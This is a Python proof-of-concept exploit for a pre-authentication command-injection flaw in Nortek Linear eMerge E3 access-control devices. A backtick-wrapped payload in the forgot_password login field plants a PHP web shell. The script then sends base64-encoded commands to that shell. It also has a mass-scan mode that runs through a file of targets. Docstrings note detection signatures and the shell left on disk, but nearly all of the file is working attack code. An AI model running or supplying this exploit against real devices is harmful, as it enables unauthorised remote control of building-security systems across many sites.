import argparse
import base64
import requests

# Function to exploit a single target
def exploit(target: str, port: int | str, cmd: str) -> None:
    """Run *cmd* on one eMerge E3 host by dropping a PHP stub, then calling it.

    Two HTTPS POSTs are issued (both with ``verify=False``, so the TLS
    certificate is never checked and the traffic is open to interception):

    1. ``index.php?c=user&m=forgot_password`` with a ``login_id`` value wrapped
       in backticks, which writes a PHP file to ``img/index.html``.
    2. ``/img/index.html`` with form field ``c`` = base64(*cmd*); the stub
       base64-decodes ``c``, runs it and echoes the output.

    From a detection standpoint both requests are distinctive: a
    ``login_id`` containing backticks and ``<?php``, followed by POSTs to
    ``/img/index.html`` carrying a base64 ``c`` field. The dropped file is
    never removed by this function, so it remains on disk afterwards.

    Args:
        target: host name or IP of the device.
        port: HTTPS port; an ``int`` from argparse or a ``str`` from the
            targets file — only used in f-strings, so both work.
        cmd: shell command to run on the device.

    Returns:
        None. Outcome is only printed, never returned; callers cannot tell
        success from failure programmatically.
    """
    url = f"https://{target}:{port}/index.php?c=user&m=forgot_password"
    
    # Backtick-wrapped shell in login_id; the PHP stub it writes decodes POST
    # field "c" and echoes the command output.
    PAYLOAD = {'login_id': '`echo \'<?php exec(base64_decode($_POST["c"]),$output);echo(implode("\n",$output));?>\' > img/index.html`'}
    try:
        
        # NOTE: a 200 here only means the forgot_password page answered; it
        # does not prove the file was written (the next request is the real test).
        response = requests.post(url, data=PAYLOAD, verify=False, timeout=5)
        if response.status_code == 200:
            print("[+] Payload uploaded successfully.")
        else:
            print(f"[-] Failed to upload payload on {target}:{port}.")
            return
        
        
        cmd_encoded = base64.b64encode(cmd.encode()).decode()
        exec_url = f"https://{target}:{port}/img/index.html"
        exec_payload = {'c': cmd_encoded}
        response = requests.post(exec_url, data=exec_payload, verify=False, timeout=5)
        
        if response.status_code == 200:
            print(f"[+] Command executed on {target}:{port}:")
            print(response.text)
        else:
            print(f"[-] Exploit failed on {target}:{port}.")
    except Exception as e:
        # Broad catch: connection errors, timeouts and anything else are all
        # reported the same way and swallowed, so mass_scan keeps going.
        print(f"[-] Error with {target}:{port}: {e}")

# Function to perform mass scanning using a list of targets
def mass_scan(targets_file: str, cmd: str) -> None:
    """Call exploit() for every ``host:port`` line in *targets_file*.

    Each line is stripped and split on ``':'`` into exactly two parts. A line
    that does not contain exactly one colon (blank line, missing port,
    bracketed IPv6 literal) makes the tuple unpack raise ``ValueError``,
    which is *not* caught here and aborts the whole run — exploit() only
    catches errors inside its own body. ``port`` is passed on as a string.

    Args:
        targets_file: path to a text file, one ``host:port`` per line.
        cmd: command forwarded unchanged to exploit().
    """
    with open(targets_file, 'r') as file:
        for line in file:
            target, port = line.strip().split(':')
            exploit(target, port, cmd)


def main() -> None:
    """Parse the command line and dispatch to mass_scan() or exploit().

    ``--list`` takes precedence over ``--ip`` when both are given; ``--port``
    is only honoured in the single-target case (the targets file carries its
    own ports). With neither option the script prints a usage hint and exits
    with status 0 — no error code is set.
    """
    parser = argparse.ArgumentParser(description="Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)")
    
    
    parser.add_argument('--ip', help="Target IP address", type=str)
    parser.add_argument('--port', help="Target port", type=int, default=443)
    parser.add_argument('--cmd', help="Command to execute", type=str, default="/bin/ls -al /spider/web")
    
    
    parser.add_argument('--list', help="File containing list of targets (IP:port)", type=str)
    
    args = parser.parse_args()
    
    if args.list:
        
        mass_scan(args.list, args.cmd)
    elif args.ip:
        
        # args.port is an int here (argparse type=int), unlike the str from mass_scan.
        exploit(args.ip, args.port, args.cmd)
    else:
        print("[-] Please provide either a single target (--ip) or a list of targets (--list).")

# Script entry point; importing the module defines the functions without running anything.
if __name__ == "__main__":
    main()